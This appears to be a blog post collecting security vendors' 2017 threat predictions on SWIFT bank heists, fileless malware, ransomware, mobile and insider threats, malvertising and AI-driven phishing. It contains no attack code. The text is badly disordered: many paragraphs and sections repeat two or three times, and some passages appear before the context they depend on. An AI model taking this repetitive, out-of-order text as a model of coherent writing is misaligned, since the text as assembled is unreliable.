In 2016 Kaspersky Lab research discovered the extent to which companies struggle to quickly spot a security incident: 28.7% said it took them several days to discover such an event, while 19% admitted it took weeks or more. For a small but significant minority of 7.1%, it took months. Among those that struggled most, eventual discovery often came about through an external or internal security audit, or an alert from a third party, such as a client or a customer.
 |
| Source: Sophos. Jakobsen. |
"For example, attacks against Border Gateway Protocol (BGP) could potentially disrupt, hijack, or disable much of the Internet. And the distributed denial of service (DDoS) attack on Dyn in October (launched by a myriad of Internet of Things [IoT] devices), took down the DNS provider and, along with it, access to part of the Internet. It was one of the largest assaults seen and those claiming responsibility said that it was just a dry run. Large-scale ISPs and enterprises can take some steps to respond, but these may well fail to prevent serious damage if individuals or states choose to exploit the Internet's deepest security flaws.”
Kaspersky Lab says that ProjectSauron is also an example of a passive implant, defined as malware that presents little or no outward indication of an active infection, so it is more likely to avoid detection. Another way of avoiding detection will be malware that stays in the system for a very short time, or what Kaspersky terms an 'ephemeral infection'. “In highly sensitive environments, stealthy attackers may be satisfied to operate until a reboot wipes their infection from memory if it means avoiding all suspicion or potential operational loss from the discovery of their malware by defenders and researchers,” Raiu and Guerrero-Saade said.
Symantec experts describe similar cyber attacks as 'fileless infections', noting that malware that targets computer memory rather than files are difficult to detect. "This type of attack increased throughout 2016 and will continue to gain prominence in 2017, most likely through PowerShell attacks," the Symantec experts said.
Hackers will be trying other ways to profit. In 2016, the SWIFT heist in Bangladesh made headlines around the world, not only for the large sums of money lost, but because it was a new type of security breach.
“The SWIFT attack was a proof of concept for criminals, and as a result institutional payments will be a growing attack vector through combined cyber and fraud attacks. Traditionally, the retail payments channels have been pretty well-protected with detection tools, but the SWIFT heist illustrated that all payment types, including those used by corporates and internationals, are at risk, including wholesale, corporate and institutional banking channels.
"The modus operandi could be the insider, malware, social engineering, hijacked email instruction, man-in-the-browser* or identity theft. Luckily, banks are switching on to this shift and moving from solely financial crime intelligence units to include information security, and are hiring people to look after cyber risk in corporate institutional divisions,” said Boye Vanell, Regional Director Asia, BAE Systems Applied Intelligence.
Kaspersky Lab also predicts the rise of SWIFT-heist middlemen. “Performing one of these heists requires initial access, specialised software, patience, and, eventually, a money laundering scheme. Each of these steps has a place for already-established criminals to provide their services at a fee, with the missing piece being the specialised malware for performing SWIFT attacks. We expect to see the commodification of these attacks through specialised resources being offered for sale in underground forums or through as-a-service schemes,” said the GreaT team.
Financial infrastructure at greater risk of attack, Sophos' Jakobsen adds. “The use of targeted phishing and 'whaling' (editor's note: the targeting of a senior person in order to get privileged access to important data) continues to grow. These attacks use detailed information about company executives to trick employees into paying fraudsters or compromising accounts. We also expect more attacks on critical financial infrastructure, such as the attack involving SWIFT-connected institutions which cost the Bangladesh Central Bank US$81 million in February. SWIFT recently admitted that there have been other such attacks and it expects to see more, stating in a leaked letter to client banks: 'The threat is very persistent, adaptive and sophisticated – and it is here to stay'.”
"The digital footprint of both businesses and individuals has expanded dramatically, increasing the potential attack surface. Additionally, everything has become a target and anything can be a weapon. Threats are becoming more intelligent, operate autonomously, and are increasingly difficult to detect. Lastly, old threats keep returning, but enhanced with new technologies that push the boundaries of detection and forensic investigation," summarised the FortiGuard Labs threat research team. FortiGuard Labs is Fortinet's cyber security intelligence arm. "In (2017) we expect to see malware designed (to be) “human-like” with adaptive, success-based learning to improve the impact and efficacy of attacks."
Even in a world where every security flaw can become critical, some flaws will be more critical than others. Security specialists have flagged the following as some of the key concerns for cyber security this year:
Advertising, malvertising
Sophos agreed with Kaspersky Lab on the growth of malvertising and corruption of online advertising ecosystems. “Malvertising, which spreads malware through online ad networks and web pages, has been around for years. But in 2016, we saw much more of it. These attacks highlight larger problems throughout the advertising ecosystem, such as click fraud, which generates paying clicks that don't correspond to real customer interest. Malvertising has actually generated click fraud, compromising users and stealing from advertisers at the same time," Jakobsen said.
What next?
With the threat landscape expanding and evolving, what is clear is that more investment will be poured into cyber defence, both at the user and the vendor level. Hillstone Networks' Liu said, "In 2016, more investment was placed on post-breach detection, incident response and data-centric security. This trend will continue into 2017. Technological developments in the area of breach detection, data leak protection, remediation will focus on the full cyber-kill chain rather than an isolated attack."
Business concerns with cybersecurity will see many organisations in Southeast Asia moving to security subscription services and engaging closely with providers to protect their network, adds Tan Kit Yong, Regional Director, Southeast Asia, CenturyLink. "Businesses will need technology standardisation, automation and a datacentric approach to information and network security," he added.
“To change the rules of the game between attackers and defenders, we need to neutralise our adversaries’ greatest advantages,” said Vincent Weafer, VP of Intel Security’s McAfee Labs. “As a new defensive technique is developed, its effectiveness increases until attackers are compelled to develop countermeasures to evade it. To overcome the designs of our adversaries, we need to go beyond understanding the threat landscape to changing the defender-attacker dynamics in six key areas: information asymmetry, making attacks more expensive, improving visibility, better identifying exploitation of legitimacy, improving protection for decentralised data, and detecting and protecting in agentless environments.”
“Threats come in various forms, including ransomware, firmware attacks, attacks on IoT devices, social engineering attacks and more. Cybercrime will continue to evolve in Asia, and cybersecurity professionals need to evolve correspondingly to ensure our enemies do not get the upper hand. The cyberthreat paradigm needs to be altered to focus on defender-attacker dynamics. Only then can cybersecurity practitioners break the cycle of cyber criminals circumventing new cyber defence tactics,” added David Allott, Director of Cyber Defence, Intel Security.
More accountability
BAE's Vanell predicts that the way government and enterprises view security could evolve. "We predict 2017 will see the end of the age of innocence for senior business leaders and boards faced with cyber attacks; we will see more executives being held accountable for not implementing the right security measures in place. No longer can any Internet-connected system be expected to be 100% secure, and no longer can businesses survive without proper investment in cyber defence. However, companies will also realise they needn’t view security and privacy as a compliance burden, but as an opportunity to win the trust of their customers and differentiate themselves in the market,” Vanell said.
Derek Manky, Global Security Strategist, Fortinet concurred. “The expanding attack surface enabled by technology innovations such as cloud computing and IoT devices, a global shortage of cybersecurity talent, and regulatory pressures continue to be significant drivers of cyber threats. The pace of these changes is unprecedented, resulting in a critical tipping point as the impact of cyber attacks are felt well beyond their intended victims in personal, political, and business consequences. Going forward, the need for accountability at multiple levels is urgent and real affecting vendors, governments, and consumers alike. Without swift action, there is a real risk of disrupting the progress of the global digital economy,” he said.
BAE also calls for the private and public sectors to work together towards a measurement standard for cyber hygiene. "Just as we have agreed measurement standards for the health of the economy or vital services like education, we predict 2017 will see cyber hygiene unprecedently measured in a standardised way to remind businesses and nations of their responsibilities for personal data. What that measurement looks like is a question industry, government and the wider business community must work out together," he said.
What cognitive computing can do for cybersecurity
Vendors will increasingly incorporate machine learning and artificial intelligence (AI) into security solutions as the technologies come of age.
“Machine learning is poised to be a crucial element in battling known and unknown ransomware threats and exploit kit attacks, among others,” Trend Micro's Siah predicted. “Machine learning is deployed through a layered system with human- and computer-provided inputs running through mathematical algorithms. This model is then pitted against network traffic, allowing a machine to make quick and accurate decisions about whether the network content—files and behaviours—are malicious or not.”
Jun Shi, VP, Sales Engineering and CTO (APAC), Juniper Networks said that the benefits are clear. “While organisations today invest heavily in effective security hardware and software, they often lack the security specialists necessary to ensure their effectiveness. With AI embedded in security systems, security personnel will have access to increased resources to better enforce a consistent security policy, as they are relieved from manually sieving through a sea of alerts to find the truly malicious ones,” he said.
"There will be an significant increase in AI investments in 2017 compared to 2016. AI will provide business users access to powerful insights and will drive faster business decisions in marketing, e-commerce, product management and other areas of the business by helping close the gap from insights to action. Application of AI in security is expected to gain momentum as the next logical step, underpinning systems that can identify, analyse, learn, anticipate and adjust to cybersecurity threats," agreed Naveen Bhat, MD, Ixia, Asia Pacific.
But Aurora of Darktrace points out it will work both ways, with AI also being used by attackers to “wield highly sophisticated and persistent attacks that blend into the noise of busy networks”. “We have already seen the first glimpses of these types of attack. Polymorphic malware, which changes its attributes mid-attack to evade detection, has reinforced the obsolescence of signature-based detection methods. What is emerging is a next generation of attacks that use AI-powered, customised code to emulate the behaviours of specific users so accurately as to fool even skilled security personnel,” he said.
“In 2017, we can expect AI to be applied to all stages of a cyber-attacker’s mission. This includes the ability to craft sophisticated and bespoke phishing campaigns that will successfully dupe even the most threat-conscious employee. (2017's) attacker can see more than your social media profile – they know that your 10am meeting with your supplier is being held at their new headquarters. At 9:15am, as you get off the train, an email with the subject line Directions to Our Office arrives in your inbox, apparently from the person that you are meeting. Now, do you click the map link in that email?”
Interested?
Read the related TechTrade Asia blog posts on IoT security in 2017 and on the problem of data integrity
Kaspersky Lab named ransomware its security story of the year for 2016 is a related blog post, as is McAfee Labs' 2017 threat predictions
Read the TechTrade Asia blog post about security becoming an availability issue for data centres
Check out the TechTrade Asia blog posts about the APJ findings for the CA Technologies security survey and ESET's report of a Linux ransomware scam
*Data travels through different networks, hardware and software to get to a destination. This refers to a 'middleman' at the browser software stealing the data, or affecting it in some way.
^Yara is a language which has been found to be particularly useful for creating detection tools.
Costin Raiu, Director of Global Research and Analysis Team (GreAT) at Kaspersky Lab and Juan AndrĂ©s Guerrero-Saade, Senior Security Researcher, Kaspersky Lab's GreAT say in their 2017 predictions that indicators of compromise (IoCs) – signs that point to an infection being present - are good to share traits of already known malware, but not when that malware is as yet undetected.
The Kaspersky Lab authors point to the ProjectSauronAPT, for example, a malware platform which is tailored for each victim to such a degree that any indicators cannot be used to detect other infections. “That is not to say that defenders are entirely without recourse but it’s time to push for the wider adoption of good Yara rules^ that allow us to both scan far-and-wide across an enterprise, inspect and identify traits in binaries at rest, and scan memory for fragments of known attacks,” Raiu and Guerrero-Saade said.
Symantec experts describe similar cyber attacks as 'fileless infections', noting that malware that targets computer memory rather than files are difficult to detect. "This type of attack increased throughout 2016 and will continue to gain prominence in 2017, most likely through PowerShell attacks," the Symantec experts said.
Hackers will be trying other ways to profit. In 2016, the SWIFT heist in Bangladesh made headlines around the world, not only for the large sums of money lost, but because it was a new type of security breach.
 |
| Source: BAE Systems. Vanell. |
"The modus operandi could be the insider, malware, social engineering, hijacked email instruction, man-in-the-browser* or identity theft. Luckily, banks are switching on to this shift and moving from solely financial crime intelligence units to include information security, and are hiring people to look after cyber risk in corporate institutional divisions,” said Boye Vanell, Regional Director Asia, BAE Systems Applied Intelligence.
"The digital footprint of both businesses and individuals has expanded dramatically, increasing the potential attack surface. Additionally, everything has become a target and anything can be a weapon. Threats are becoming more intelligent, operate autonomously, and are increasingly difficult to detect. Lastly, old threats keep returning, but enhanced with new technologies that push the boundaries of detection and forensic investigation," summarised the FortiGuard Labs threat research team. FortiGuard Labs is Fortinet's cyber security intelligence arm. "In (2017) we expect to see malware designed (to be) “human-like” with adaptive, success-based learning to improve the impact and efficacy of attacks."
Even in a world where every security flaw can become critical, some flaws will be more critical than others. Security specialists have flagged the following as some of the key concerns for cyber security this year:
Securing the mobile world
As more users spend more time on their mobile devices, this will be where hackers strike next. "The mobile space will be increasingly attractive to hackers. “(Mobile platforms) will surely benefit from decreased attention and the difficulty of attaining forensic tools for the latest mobile operating systems,” said Raiu and Guerrero-Saade of Kaspersky Lab.
"Most mobile payment systems require linking a personal bank account or credit card for direct charges. The level of security of mobile devices is still not on par with the computers and are easier to hack, making breaches harder to detect. Compromised mobile terminals may leak confidential information on these accounts or allow unauthorised charges to these accounts. Financial institutions also rely on limiting transaction sizes and employing fraud detection tools for security purposes. Over time, we will see hackers coming up with more sophisticated ways to defraud the system," said Tim Liu, CTO, Hillstone Networks.
“In an increasingly mobile workforce, identity and access management (IAM) will be one area in security to watch out for in 2017. In fact, 85% of Asia Pacific & Japan (APJ) respondents in our recent global survey said that identity-centric security is critical to their business, whether for physical premises and mobile applications. To step up their game and stay secure, businesses must go beyond the basics of password management and single sign-on, and implement strong step-up authentication focusing on privileged identities and access,” said Stephen Miles, CTO, Asia Pacific and Japan, CA Technologies.
Ransomware
Expect more ransomware attempts. "We expect to see very focused attacks against high-profile targets, such as celebrities, political figures, and large organisations. Automated attacks will introduce an economy of scale to ransomware that will allow hackers to cost-effectively extort small amounts of money from large numbers of victims simultaneously, especially by targeting IoT devices," said FortiGuard Labs researchers.
Ransomware will evolve. “As more users recognise the risks of ransomware attack via email, criminals are exploring other vectors. Some are experimenting with malware that reinfects later, long after a ransom is paid, and some are starting to use built-in tools and no executable malware at all to avoid detection by endpoint protection code that focuses on executable files,” said Jakobsen of Sophos.
As more users spend more time on their mobile devices, this will be where hackers strike next. "The mobile space will be increasingly attractive to hackers. “(Mobile platforms) will surely benefit from decreased attention and the difficulty of attaining forensic tools for the latest mobile operating systems,” said Raiu and Guerrero-Saade of Kaspersky Lab.
"Most mobile payment systems require linking a personal bank account or credit card for direct charges. The level of security of mobile devices is still not on par with the computers and are easier to hack, making breaches harder to detect. Compromised mobile terminals may leak confidential information on these accounts or allow unauthorised charges to these accounts. Financial institutions also rely on limiting transaction sizes and employing fraud detection tools for security purposes. Over time, we will see hackers coming up with more sophisticated ways to defraud the system," said Tim Liu, CTO, Hillstone Networks.
 |
| Source: CA Technologies. Miles. |
Ransomware
Expect more ransomware attempts. "We expect to see very focused attacks against high-profile targets, such as celebrities, political figures, and large organisations. Automated attacks will introduce an economy of scale to ransomware that will allow hackers to cost-effectively extort small amounts of money from large numbers of victims simultaneously, especially by targeting IoT devices," said FortiGuard Labs researchers.
Ransomware will evolve. “As more users recognise the risks of ransomware attack via email, criminals are exploring other vectors. Some are experimenting with malware that reinfects later, long after a ransom is paid, and some are starting to use built-in tools and no executable malware at all to avoid detection by endpoint protection code that focuses on executable files,” said Jakobsen of Sophos.
"Recent examples (are the offer) to decrypt files after the victim shared the ransomware with two friends, and those friends paid to decrypt their files. Ransomware authors are also starting to use techniques other than encryption, for example deleting or corrupting file headers. And finally, with 'old' ransomware still floating around the web, users may fall victim to attacks that can't be 'cured' because payment locations no longer work.”
While many security vendors have been warning that there is no guarantee that ransomware will return files in return for ransoms, things have worked out so far. In 2017, Kaspersky Lab says that there will be a crisis of confidence. “Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling (the ransomware) promise and this has allowed the ecosystem to thrive. However, as the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise,” they said.
“We expect ‘skiddie’ (editor's note: script kiddie) ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return.”
Solarwinds also sees that an increase in data breaches will force organisations to weigh the implications of potential data loss against the expense of hiring security experts. “In many cases, businesses in 2017 will choose to take a calculated risk about what they can 'afford to lose' rather than what it costs to prevent data loss entirely. This response will be especially true in the case of ransomware attacks, when it is nearly impossible to guarantee that hackers will not leak or reveal stolen data, even after receiving the 'ransom' payment,” said Leon Adato, Head Geek and Technical Evangelist at SolarWinds.
Jeffrey Kok, Senior Director of Presales, Asia Pacific and Japan, CyberArk, also believes in not paying ransoms. "Paying a ransom only emboldens cyber criminals, and does not guarantee that you will get your data back," he agreed. "Most anti-malware and anti-ransomware solutions today focus on detecting and blocking malware at the point of inception. These solutions can be helpful when you know what you’re looking for – but when it comes to ransomware, there are new variants coming out every day," he said.
"Standard ransomware just infects user machines; this is the same ransomware that would infect a regular consumer at home. These attacks will be opportunistic and less damaging to organisations. Advanced ransomware is far more dangerous. These ransomware attacks follow the same general attack pattern as targeted network attacks, but for a very different end goal. Instead of information theft, ransomware attackers seek to cause widespread havoc through mass infection and encryption of user data."
Kok recommends backups plus combining privileged access and application control to stem advanced ransomware attacks. Implementing 'least-privileged' access, or only enough access as required, and removing local privileges, the ability to access more sensitive parts of the network, from regular PCs reduce the likelihood of hackers getting their hands on sensitive files. 'Grey listing' apps, on the other hand, restricts the execution of apps that could turn out to be ransomware until their trustworthiness can be determined. White listed apps are those which are trusted while black listed apps are already blocked.
David Siah, Country Manager, Singapore, Trend Micro said, “In 2017, ransomware will remain a top threat. Its operations will become fuller, as more variants are produced; deeper, as well-planned targeted attacks are launched; and wider, as threats affect non-desktop targets like mobile and smart devices.
“From January to September 2016, we saw a staggering 400% spike in the number of ransomware families. We predict a 25% growth in the number of new ransomware families in 2017, translating to an average of 15 new families discovered each month. Although the tipping point has passed in 2016, a period of stabilisation will push competing cybercriminals to diversify, hitting more potential victims, platforms, and bigger targets.
“Mobile ransomware will likely follow the same trajectory as desktop ransomware given how the mobile user base is now a viable, untapped target. Non-desktop computing terminals like point-of-sale (PoS) systems or ATMs may also suffer extortion-type attacks.”
Shadow IT
Shadow IT, the phenomenon of employees using their own devices, managing their own apps and data, and use their own personal collaboration tools to perform their job, continues to rise because enterprise IT is unable to compete with features, ease of use, and reliability of consumer services, says Adam Judd, VP, Asia Pacific Japan, Brocade.
"While some organisations will attempt to legislate security via corporate policy, in 2017 the most enlightened companies will recognise the implicit threat of sub-par IT services. The most successful IT and info-sec teams will collaborate on simultaneously modernising and securing their infrastructure with software-defined networking (SDN), orchestrated network function virtualisation (NFV) security services, advanced encryption and identity management, integration of cloud services, and compartmentalisation of local apps," he said.
While many security vendors have been warning that there is no guarantee that ransomware will return files in return for ransoms, things have worked out so far. In 2017, Kaspersky Lab says that there will be a crisis of confidence. “Cybercriminals have exhibited a surprising semblance of professionalism in fulfilling (the ransomware) promise and this has allowed the ecosystem to thrive. However, as the popularity continues to rise and a lesser grade of criminal decides to enter the space, we are likely to encounter more and more ‘ransomware’ that lacks the quality assurance or general coding capability to actually uphold this promise,” they said.
“We expect ‘skiddie’ (editor's note: script kiddie) ransomware to lock away files or system access or simply delete the files, trick the victim into paying the ransom, and provide nothing in return.”
 |
| Source: Solarwinds. Adato. |
Jeffrey Kok, Senior Director of Presales, Asia Pacific and Japan, CyberArk, also believes in not paying ransoms. "Paying a ransom only emboldens cyber criminals, and does not guarantee that you will get your data back," he agreed. "Most anti-malware and anti-ransomware solutions today focus on detecting and blocking malware at the point of inception. These solutions can be helpful when you know what you’re looking for – but when it comes to ransomware, there are new variants coming out every day," he said.
 |
| Source: CyberArk. Kok. |
Kok recommends backups plus combining privileged access and application control to stem advanced ransomware attacks. Implementing 'least-privileged' access, or only enough access as required, and removing local privileges, the ability to access more sensitive parts of the network, from regular PCs reduce the likelihood of hackers getting their hands on sensitive files. 'Grey listing' apps, on the other hand, restricts the execution of apps that could turn out to be ransomware until their trustworthiness can be determined. White listed apps are those which are trusted while black listed apps are already blocked.
David Siah, Country Manager, Singapore, Trend Micro said, “In 2017, ransomware will remain a top threat. Its operations will become fuller, as more variants are produced; deeper, as well-planned targeted attacks are launched; and wider, as threats affect non-desktop targets like mobile and smart devices.
 |
| Source: Trend Micro. Siah. |
“Mobile ransomware will likely follow the same trajectory as desktop ransomware given how the mobile user base is now a viable, untapped target. Non-desktop computing terminals like point-of-sale (PoS) systems or ATMs may also suffer extortion-type attacks.”
Shadow IT
 |
| Source: Brocade. Judd. |
"While some organisations will attempt to legislate security via corporate policy, in 2017 the most enlightened companies will recognise the implicit threat of sub-par IT services. The most successful IT and info-sec teams will collaborate on simultaneously modernising and securing their infrastructure with software-defined networking (SDN), orchestrated network function virtualisation (NFV) security services, advanced encryption and identity management, integration of cloud services, and compartmentalisation of local apps," he said.
The role of the insider
Insiders are often the source of the most dangerous attacks, says Sanjay Aurora, MD, Asia Pacific, Darktrace. "They are harder to detect, because they use legitimate user credentials. They can do maximum damage, because they have knowledge of and privileged access to information required for their jobs, and can hop between network segments. A disgruntled employee looking to do damage stands a good chance through a cyber attack," he said.
Non-malicious insiders are just as much of a vulnerability, Aurora adds. "How many times have links been clicked before checking email addresses? Or security policy contravened to get a job done quicker, such as uploading confidential documents on less secure public file hosting services? We can no longer reasonably expect 100% of employees and network users to be impervious to cyber-threats that are getting more advanced – they won’t make the right decision, every time.”
Due to the increasing sophistication of external hackers, organisations are going to have a harder time distinguishing between insiders and external attackers who have hijacked legitimate user credentials, Aurora warned. “Organisations need to combat this insider threat by gaining visibility into their internal systems, rather than trying to reinforce their network perimeter. We don’t expect our skin to protect us from viruses – so we shouldn’t expect a firewall to stop advanced cyber-threats which, in many cases, originate from the inside in the first place."
Sophos has also noticed how hackers have become more effective at targeting insiders. "Cybercriminals are getting better at exploiting the ultimate vulnerability - humans. Ever more sophisticated and convincing targeted attacks seek to coax users into compromising themselves,” Jakobsen of Sophos warned. “For example, it’s common to see an email that addresses the recipient by name and claims they have an outstanding debt the sender has been authorised to collect. Shock, awe or borrowing authority by pretending to be law enforcement are common and effective tactics. The email directs them to a malicious link that users are panicked into clicking on, opening them up to attack. Such phishing attacks can no longer be recognised by obvious mistakes.”
 |
| Source: Darktrace. Aurora. |
Non-malicious insiders are just as much of a vulnerability, Aurora adds. "How many times have links been clicked before checking email addresses? Or security policy contravened to get a job done quicker, such as uploading confidential documents on less secure public file hosting services? We can no longer reasonably expect 100% of employees and network users to be impervious to cyber-threats that are getting more advanced – they won’t make the right decision, every time.”
Due to the increasing sophistication of external hackers, organisations are going to have a harder time distinguishing between insiders and external attackers who have hijacked legitimate user credentials, Aurora warned. “Organisations need to combat this insider threat by gaining visibility into their internal systems, rather than trying to reinforce their network perimeter. We don’t expect our skin to protect us from viruses – so we shouldn’t expect a firewall to stop advanced cyber-threats which, in many cases, originate from the inside in the first place."
Sophos has also noticed how hackers have become more effective at targeting insiders. "Cybercriminals are getting better at exploiting the ultimate vulnerability - humans. Ever more sophisticated and convincing targeted attacks seek to coax users into compromising themselves,” Jakobsen of Sophos warned. “For example, it’s common to see an email that addresses the recipient by name and claims they have an outstanding debt the sender has been authorised to collect. Shock, awe or borrowing authority by pretending to be law enforcement are common and effective tactics. The email directs them to a malicious link that users are panicked into clicking on, opening them up to attack. Such phishing attacks can no longer be recognised by obvious mistakes.”
Working on a defence is important, nevertheless. Trend Micro's Siah stressed that training employees should move from simply being aware of threats to actually acknowledging and collectively working to protect against them, for example by adding more checks and balances for potentially suspicious behaviour. “Educate employees in areas such as social engineering techniques and keep them up-to-date on the latest business email compromise (BEC) scams is crucial to establishing improved cybersecurity habits to living a safer digital life," he said.
"Implement stringent policies for normal and out-of-the-ordinary transactions, which include layers of verification and thresholds for large sums requiring more validation, before executing transfers,” Siah added.
Skilled cybersecurity professionals are sorely needed for proper cybersecurity, FortiGuard Labs stressed. "The current shortage of skilled cybersecurity professionals means that many organisations or countries looking to participate in the digital economy globally will do so at great risk. They simply do not have the experience or training necessary to develop a security policy, protect critical assets that now move freely between network environments, or identify and respond to today’s more sophisticated attacks," said FortiGuard Lab researchers.
"Implement stringent policies for normal and out-of-the-ordinary transactions, which include layers of verification and thresholds for large sums requiring more validation, before executing transfers,” Siah added.
Skilled cybersecurity professionals are sorely needed for proper cybersecurity, FortiGuard Labs stressed. "The current shortage of skilled cybersecurity professionals means that many organisations or countries looking to participate in the digital economy globally will do so at great risk. They simply do not have the experience or training necessary to develop a security policy, protect critical assets that now move freely between network environments, or identify and respond to today’s more sophisticated attacks," said FortiGuard Lab researchers.
Advertising, malvertising
Another 2017 prediction from Kaspersky Lab involves the use of advertising networks as malware. “Their
placement is already entirely financially motivated and there is
little or no regulation, as evidenced by recurring malvertising
attacks on major sites. By their very nature, ad networks provide
excellent target profiling through a combination of IPs (editor's
note: IP addresses), browser fingerprinting, and browsing interest
and login selectivity. This kind of user data allows a discriminate
attacker to selectively inject or redirect specific victims to their
payloads and thus largely avoid collateral infections and the
persistent availability of payloads that tend to pique the interest
of security researchers. As such, we expect the most advanced
cyberespionage actors to find the creation or co-opting of an ad
network to be a small investment for sizeable operational returns,
hitting their targets while protecting their latest toolkits,” they
said.
Sophos agreed with Kaspersky Lab on the growth of malvertising and corruption of online advertising ecosystems. “Malvertising, which spreads malware through online ad networks and web pages, has been around for years. But in 2016, we saw much more of it. These attacks highlight larger problems throughout the advertising ecosystem, such as click fraud, which generates paying clicks that don't correspond to real customer interest. Malvertising has actually generated click fraud, compromising users and stealing from advertisers at the same time," Jakobsen said.
What next?
 |
| Source: Hillstone Networks. Liu. |
Business concerns with cybersecurity will see many organisations in Southeast Asia moving to security subscription services and engaging closely with providers to protect their network, adds Tan Kit Yong, Regional Director, Southeast Asia, CenturyLink. "Businesses will need technology standardisation, automation and a datacentric approach to information and network security," he added.
“To change the rules of the game between attackers and defenders, we need to neutralise our adversaries’ greatest advantages,” said Vincent Weafer, VP of Intel Security’s McAfee Labs. “As a new defensive technique is developed, its effectiveness increases until attackers are compelled to develop countermeasures to evade it. To overcome the designs of our adversaries, we need to go beyond understanding the threat landscape to changing the defender-attacker dynamics in six key areas: information asymmetry, making attacks more expensive, improving visibility, better identifying exploitation of legitimacy, improving protection for decentralised data, and detecting and protecting in agentless environments.”
“Threats come in various forms, including ransomware, firmware attacks, attacks on IoT devices, social engineering attacks and more. Cybercrime will continue to evolve in Asia, and cybersecurity professionals need to evolve correspondingly to ensure our enemies do not get the upper hand. The cyberthreat paradigm needs to be altered to focus on defender-attacker dynamics. Only then can cybersecurity practitioners break the cycle of cyber criminals circumventing new cyber defence tactics,” added David Allott, Director of Cyber Defence, Intel Security.
 |
| Source: CenturyLink. Tan. |
BAE's Vanell predicts that the way government and enterprises view security could evolve. "We predict 2017 will see the end of the age of innocence for senior business leaders and boards faced with cyber attacks; we will see more executives being held accountable for not implementing the right security measures in place. No longer can any Internet-connected system be expected to be 100% secure, and no longer can businesses survive without proper investment in cyber defence. However, companies will also realise they needn’t view security and privacy as a compliance burden, but as an opportunity to win the trust of their customers and differentiate themselves in the market,” Vanell said.
Derek Manky, Global Security Strategist, Fortinet concurred. “The expanding attack surface enabled by technology innovations such as cloud computing and IoT devices, a global shortage of cybersecurity talent, and regulatory pressures continue to be significant drivers of cyber threats. The pace of these changes is unprecedented, resulting in a critical tipping point as the impact of cyber attacks are felt well beyond their intended victims in personal, political, and business consequences. Going forward, the need for accountability at multiple levels is urgent and real affecting vendors, governments, and consumers alike. Without swift action, there is a real risk of disrupting the progress of the global digital economy,” he said.
BAE also calls for the private and public sectors to work together towards a measurement standard for cyber hygiene. "Just as we have agreed measurement standards for the health of the economy or vital services like education, we predict 2017 will see cyber hygiene unprecedently measured in a standardised way to remind businesses and nations of their responsibilities for personal data. What that measurement looks like is a question industry, government and the wider business community must work out together," he said.
What cognitive computing can do for cybersecurity
Vendors will increasingly incorporate machine learning and artificial intelligence (AI) into security solutions as the technologies come of age.
“Machine learning is poised to be a crucial element in battling known and unknown ransomware threats and exploit kit attacks, among others,” Trend Micro's Siah predicted. “Machine learning is deployed through a layered system with human- and computer-provided inputs running through mathematical algorithms. This model is then pitted against network traffic, allowing a machine to make quick and accurate decisions about whether the network content—files and behaviours—are malicious or not.”
 |
| Source: Juniper Networks. Shi. |
 |
| Source: Ixia. Bhat. |
But Aurora of Darktrace points out it will work both ways, with AI also being used by attackers to “wield highly sophisticated and persistent attacks that blend into the noise of busy networks”. “We have already seen the first glimpses of these types of attack. Polymorphic malware, which changes its attributes mid-attack to evade detection, has reinforced the obsolescence of signature-based detection methods. What is emerging is a next generation of attacks that use AI-powered, customised code to emulate the behaviours of specific users so accurately as to fool even skilled security personnel,” he said.
“In 2017, we can expect AI to be applied to all stages of a cyber-attacker’s mission. This includes the ability to craft sophisticated and bespoke phishing campaigns that will successfully dupe even the most threat-conscious employee. (2017's) attacker can see more than your social media profile – they know that your 10am meeting with your supplier is being held at their new headquarters. At 9:15am, as you get off the train, an email with the subject line Directions to Our Office arrives in your inbox, apparently from the person that you are meeting. Now, do you click the map link in that email?”
Interested?
Read the related TechTrade Asia blog posts on IoT security in 2017 and on the problem of data integrity
Kaspersky Lab named ransomware its security story of the year for 2016 is a related blog post, as is McAfee Labs' 2017 threat predictions
Read the TechTrade Asia blog post about security becoming an availability issue for data centres
Check out the TechTrade Asia blog posts about the APJ findings for the CA Technologies security survey and ESET's report of a Linux ransomware scam
*Data travels through different networks, hardware and software to get to a destination. This refers to a 'middleman' at the browser software stealing the data, or affecting it in some way.
^Yara is a language which has been found to be particularly useful for creating detection tools.
No comments:
Post a Comment